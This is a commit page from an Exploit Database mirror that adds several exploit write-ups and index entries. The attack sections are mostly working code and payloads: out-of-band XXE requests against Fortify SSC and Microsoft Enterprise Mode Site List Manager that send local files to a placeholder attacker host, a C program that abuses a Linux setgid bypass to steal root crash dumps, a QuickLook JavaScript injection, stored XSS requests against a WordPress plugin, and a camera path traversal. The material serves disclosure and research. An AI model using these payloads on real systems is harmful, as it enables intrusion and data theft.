bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-07-17

Browse source 
7 changes to exploits/shellcodes

macOS/iOS - JavaScript Injection Bug in OfficeImporter
Linux/Ubuntu - Other Users coredumps can be read via setgid Directory and killpriv Bypass

Microsoft Enterprise Mode Site List Manager - XML External Entity Injection

Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)
Hadoop YARN ResourceManager - Command Execution (Metasploit)

VelotiSmart WiFi B-380 Camera - Directory Traversal
Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection
WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting

Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes)
This commit is contained in:
Offensive Security 2018-07-17 05:01:49 +00:00
parent b374aca9a3
commit a657b64301
9 changed files with 806 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
exploits/hardware/webapps/45030.txt Normal file
View file

@ -0,0 +1,22 @@
Title: Vulnerability in VelotiSmart Wifi - Directory Traversal
Date: 12-07-2018
Scope: Directory Traversal
Platforms: Unix
Author: Miguel Mendez Z
Vendor: VelotiSmart
Version: B380
CVE: CVE-201814064
Vulnerability description
-------------------------
- The vulnerability that affects the device is LFI type in the uc-http service 1.0.0. What allows to obtain information of configurations, wireless scanned networks, sensitive directories, etc. Of the device.
Vulnerable variable:
http://domain:80/../../etc/passwd
Exploit link:
https://github.com/s1kr10s/ExploitVelotiSmart
Poc:
https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac

208
exploits/java/webapps/45027.txt Normal file
View file

@ -0,0 +1,208 @@
Details
================
Software: Fortify SSC (Software Security Center)
Version: 17.10, 17.20 & 18.10
Homepage: https://www.microfocus.com
Advisory report: https://github.com/alt3kx/CVE-2018-12463
CVE: CVE-2018-12463 at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12463
CVSS: HIGH (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
CWE-611, CWE-918
Description
================
Out-of-Band XML External Entity (OOB-XXE) An XML External Entity attack is a type of attack against an application that parses XML input.
This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of
confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
Vulnerability
================
XML external entity (XXE) vulnerability in /ssc/fm-ws/services in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10 allows remote unauthenticated users to read arbitrary
files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request.
Proof of concept Exploit
==========================
The offending POST method below:
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8; text/html;
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1765
<?xml version='1.0' encoding='UTF-8'?>
<!Your payload here "http://intuder.IP.here/alex1.dtd"> <-- HERE!!!
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" soapenv:mustUnderstand="1">
<wsu:Timestamp xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" wsu:Id="Timestamp-2">
<wsu:Created>2018-05-24T14:27:02.619Z</wsu:Created>
<wsu:Expires>2018-05-24T14:32:02.619Z</wsu:Expires>
</wsu:Timestamp>
<wsse:UsernameToken xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" wsu:Id="UsernameToken-1">
<wsse:Username>XXXXXXX</wsse:Username>
<wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">XXXXXXXXXXX</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</soapenv:Header>
<soapenv:Body>
<ns3:GetAuthenticationTokenRequest xmlns:ns3="http://www.fortify.com/schema/fws" xmlns:ns6="xmlns://www.fortify.com/schema/issuemanagement"
xmlns:ns5="xmlns://www.fortifysoftware.com/schema/activitytemplate" xmlns:ns8="xmlns://www.fortifysoftware.com/schema/seed"
xmlns:ns7="xmlns://www.fortifysoftware.com/schema/runtime"
xmlns:ns9="xmlns://www.fortify.com/schema/attachments"
xmlns:ns2="xmlns://www.fortify.com/schema/audit"
xmlns:ns4="xmlns://www.fortifysoftware.com/schema/wsTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<ns3:TokenType>AnalysisUploadToken</ns3:TokenType>
</ns3:GetAuthenticationTokenRequest>
</soapenv:Body>
</soapenv:Envelope>
Note: As remark that is not necessary to be used the credentials or any authentication, the POST method above was extracted using Burp Suite to know the
exact API path and data sending to the server.
RedTeam Vector (1): Using “Transitional” payload, connection to HTTP server (intruder). it works!
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8; text/html;
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1789
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://intruder.ip.here/alex1.dtd">
[../snip]
RedTeam Vector (2): Classic "OOB XXE" payload, connection to HTTP server (intruder), it works!
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1750
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE data SYSTEM "http://intruder.ip.here/alex1.dtd">
<data>&send;</data>
[../snip]
RedTeam Vector (3): FTP payload with ruby FTP server emulator
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1769
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE data SYSTEM "ftp://intruder.ip.here:2121">
[../snip]
RedTeam Vector (4): FTP payloads with FTP python server
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1769
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE data SYSTEM "ftp://intruder.ip.here:2121">
[../snip]
RedTeam Vector (5): FTP payload, server compromised
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1769
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE data SYSTEM "ftp://anonymous:anonymous@intruder.ip.here:2121/alex1.txt">
[../snip]
Mitigations
================
Provided by the vendor here:
Document ID: KM03201563
https://softwaresupport.softwaregrp.com/document/-/facetsearch/document/KM03201563
Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx () protonmail com to acknowledge this report.
This vulnerability will be published if we do not receive a response to this report with 10 days.
Timeline
================
2018-05-24: Discovered
2018-05-25: Retest PRO environment
2018-05-31: Vendor notification, two issues found
2018-05-31: Vendor feedback received
2018-06-01: Internal communication
2018-06-01: Vendor feedback, two issues are confirmed
2018-06-05: Vendor notification, new issue found
2018-06-06: Vendor feedback, evaluating High submission
2018-06-08: Vendor feedback, High issue is confirmed
2018-06-19: Researcher, reminder sent
2018-06-22: Vendor feedback, summary of CVEs handled as official way
2018-06-26: Vendor feedback, official Hotfix for High issue available to test
2018-06-29: Researcher feedback
2018-07-02: Researcher feedback
2018-07-04: Researcher feedback, Hotfix tested on QA environment
2018-07-05: Vendor feedback
2018-07-09: Vendor feedback, final details to disclosure the CVE and official Hotfix availabe for customers.
2018-07-09: Vendor feedback, CVE and official Hotfix to be disclosure
2018-07-12: Agreements with the vendor to publish the CVE/Advisory.
2018-07-12: Public report

177
exploits/linux/dos/45033.c Normal file
View file

@ -0,0 +1,177 @@
/*
Note: I am both sending this bug report to security@kernel.org and filing it in
the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug
or as a Ubuntu bug. You may wish to talk to each other to determine the best
place to fix this.
I noticed halfdog's old writeup at
https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
, describing essentially the following behavior in combination with a
trick for then writing to the resulting file without triggering the
killpriv logic:
=============
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat > demo.c
#include <fcntl.h>
int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
user@debian:~/sgid_demo$ gcc -o demo demo.c
user@debian:~/sgid_demo$ ./demo
user@debian:~/sgid_demo$ ls -l dir/file
-rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
=============
Two patches for this were proposed on LKML back then:
"[PATCH 1/2] fs: Check f_cred instead of current's creds in
should_remove_suid()"
https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.luto@kernel.org/
"[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory"
https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.luto@kernel.org/
However, as far as I can tell, neither of them actually landed.
You can also bypass the killpriv logic with fallocate() and mmap() -
fallocate() permits resizing the file without triggering killpriv,
mmap() permits writing without triggering killpriv (the mmap part is mentioned
at
https://lore.kernel.org/lkml/CAGXu5jLu6OGkQUgqRcOyQ6DABOwZ9HX3fUQ+-zC7NjLukGKnVw@mail.gmail.com/
):
=============
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat fallocate.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(void) {
int src_fd = open("/usr/bin/id", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
close(src_fd);
execl("./dir/file", "id", NULL);
err(1, "execl");
}
user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
user@debian:~/sgid_demo$ ./fallocate
uid=1000(user) gid=1000(user) egid=0(root)
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
=============
sys_copy_file_range() also looks as if it bypasses killpriv on
supported filesystems, but I haven't tested that one so far.
On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
contains group-readable crashdumps in some custom format, so you can use this
issue to steal other users' crashdumps:
=============
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 296
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash
cat: /var/crash/_usr_bin_id.0.crash: Permission denied
user@ubuntu-18-04-vm:~$ cat fallocate.c
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(int argc, char **argv) {
if (argc != 2) {
printf("usage: ./fallocate <file_to_read>");
return 1;
}
int src_fd = open("/bin/cat", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
unlink("/var/crash/privileged_cat"); /* in case we've already run before */
int fd = open("/var/crash/privileged_cat", O_RDWR|O_CREAT|O_EXCL, 02755);
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
execl("/var/crash/privileged_cat", "cat", argv[1], NULL);
err(1, "execl");
}
/*
user@ubuntu-18-04-vm:~$ gcc -o fallocate fallocate.c
user@ubuntu-18-04-vm:~$ ./fallocate /var/crash/_usr_bin_id.0.crash > /var/crash/_usr_bin_id.0.crash.stolen
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 384
-rwxr-sr-x 1 user whoopsie 35064 Jul 3 19:22 privileged_cat
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r--r-- 1 user whoopsie 50706 Jul 3 19:22 _usr_bin_id.0.crash.stolen
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ mkdir root_crash_unpacked
user@ubuntu-18-04-vm:~$ # work around bug in apport-unpack
user@ubuntu-18-04-vm:~$ sed -i 's|^UserGroups: $|UserGroups: 0|' /var/crash/_usr_bin_id.0.crash.stolen
user@ubuntu-18-04-vm:~$ apport-unpack /var/crash/_usr_bin_id.0.crash.stolen root_crash_unpacked/
user@ubuntu-18-04-vm:~$ file root_crash_unpacked/CoreDump
root_crash_unpacked/CoreDump: ELF 64-bit LSB core file x86-64, version 1 (SYSV), SVR4-style, from 'id', real uid: 0, effective uid: 0, real gid: 0, effective gid: 0, execfn: '/usr/bin/id', platform: 'x86_64'
*/

18
exploits/multiple/dos/45032.txt Normal file
View file

@ -0,0 +1,18 @@
QuickLook is a widely used feature in macOS/iOS which allows you to preview various formats such as pdf, docx, pptx, etc. The way it uses to show office files is quite interesting. First it parses the office file and converts it to HTML code using OfficeImport and renders it using WebKit. The problem is, it doesn't filter the names of fonts when generating HTML code from them. We can abuse it to inject arbitrary JavaScript code. Namely, we can execute arbitrary JavaScript code via an office file.
OfficeImport is located at /System/Library/PrivateFrameworks/OfficeImport.framework/Versions/A/OfficeImport.
I attached a PoC that will just print out "location.href". You can test it by "Right click -> Quick Look" on macOS or just opening the PoC file on iOS.
Here's the document.xml file of the PoC file where I injected JavaScript code.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas" xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml"><w:body><w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000000"><w:pPr><w:contextualSpacing w:val="0"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:cs="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS"/></w:rPr></w:pPr><w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000"><w:rPr><w:rtl w:val="0"/></w:rPr><w:t xml:space="preserve">asdfasdfasdfasdfs</w:t></w:r><w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000"><w:rPr><w:rFonts w:ascii="Trebuchet MS'</style><script>
document.write(location.href);
</script>" w:cs="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS"/><w:rtl w:val="0"/></w:rPr><w:t xml:space="preserve">asdfadfasadfas</w:t></w:r></w:p><w:sectPr><w:pgSz w:h="15840" w:w="12240"/><w:pgMar w:bottom="1440" w:top="1440" w:left="1440" w:right="1440" w:header="0"/><w:pgNumType w:start="1"/></w:sectPr></w:body></w:document>
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45032.zip

102
exploits/php/webapps/45031.txt Normal file
View file

@ -0,0 +1,102 @@
# Exploit Title: Wordpress Plugin Job Manager v4.1.0 Stored Cross Site
Scripting
# Google Dork: N/A
# Date: 2018-07-15
# Exploit Author: Berk Dusunur & Selimcan Ozdemir
# Vendor Homepage: https://wpjobmanager.com
# Software Link: https://downloads.wordpress.org/plugin/wp-job-manager.latest-stable.zip
# Affected Version: v4.1.0
# Tested on: Parrot OS / WinApp Server
# CVE : N/A
# Proof Of Concept
POST
/post-a-job/?step=%00foymtv%22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv
HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101
Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
https://target/post-a-job/?step=%00foymtv22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv
Content-Type: multipart/form-data;
boundary=---------------------------3756777582569023921817540904
Content-Length: 2379
Cookie: wp-job-manager-submitting-job-id=88664;
wp-job-manager-submitting-job-key=5ae8875580aff
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_title"
teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_description"
test</p></div></div><form input=""><p></p><script>alert('1')</script><a
href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_region"
184
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_type"
2
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="application"
www.google.com
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_location"
Adelaide, Australia
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_name"
teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_tagline"
teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_website"
www.google.com
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_logo"; filename=""
Content-Type: application/octet-stream
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_poster_name"
teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_poster_email"
xssiletarihyazilmaz@gmail.com
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_manager_form"
submit-job
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_id"
0
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="step"
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="submit_job"
Preview
-----------------------------3756777582569023921817540904--

92
exploits/windows/local/45026.txt Normal file
View file

@ -0,0 +1,92 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-ENTERPRISE-MODE-SITE-LIST-MANAGER-XXE.txt
[+] ISR: Apparition Security
***Greetz: indoushka | Eduardo***
Vendor
=============
www.microsoft
Product
===========
Enterprise Mode Site List Manager
versions(1/2)
You can use IE11 and the Enterprise Mode Site List Manager to add individual website domains and domain paths
and to specify whether the site renders using Enterprise Mode or the default mode.
Vulnerability Type
===================
XML External Entity Injection
CVE Reference
==============
N/A
Security Issue
================
Versions 1 and 2 of Microsoft Enterprise Mode Site List Manager allow local file exfiltration to a remote attacker controlled server, if the user is tricked
into using an attacker supplied ".emie" site list manager file type.
Exploit/POC
=============
1) python -m SimpleHTTPServer
2) POC.emie
<?xml version="1.0"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "c:\Windows\msdfmap.ini">
<!ENTITY % dtd SYSTEM "http://ADVERSARY-IP:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
3) payload.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ADVERSARY-IP:8000?%file;'>">
%all;
Import the POC.emie into Enterprise Mode Site List Manager, then remote attackers will recieve local user files... nice.
Network Access
===============
Remote
Severity
=========
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

8
files_exploits.csv
View file

@ -6017,6 +6017,8 @@ id,file,description,date,author,type,platform,port
45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows,
45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
45017,exploits/windows/dos/45017.html,"G DATA Total Security 25.4.0.3 - Activex Buffer Overflow",2018-07-13,"Filipe Xavier Oliveira",dos,windows,
45032,exploits/multiple/dos/45032.txt,"macOS/iOS - JavaScript Injection Bug in OfficeImporter",2018-07-16,"Google Security Research",dos,multiple,
45033,exploits/linux/dos/45033.c,"Linux/Ubuntu - Other Users coredumps can be read via setgid Directory and killpriv Bypass",2018-07-16,"Google Security Research",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9814,6 +9816,7 @@ id,file,description,date,author,type,platform,port
44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows,
45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16618,7 +16621,7 @@ id,file,description,date,author,type,platform,port
45018,exploits/java/remote/45018.rb,"Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,java,8181
45019,exploits/linux/remote/45019.rb,"Apache CouchDB - Arbitrary Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,5984
45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39657,6 +39660,9 @@ id,file,description,date,author,type,platform,port
45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80
45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443
45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80
45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware,
45027,exploits/java/webapps/45027.txt,"Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection",2018-07-16,alt3kx,webapps,java,
45031,exploits/php/webapps/45031.txt,"WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting",2018-07-16,"Berk Dusunur",webapps,php,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -894,3 +894,4 @@ id,file,description,date,author,type,platform
44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm
44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86
45029,shellcodes/arm/45029.c,"Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2018-07-16,odzhancode,shellcode,arm

1 id file description date author type platform
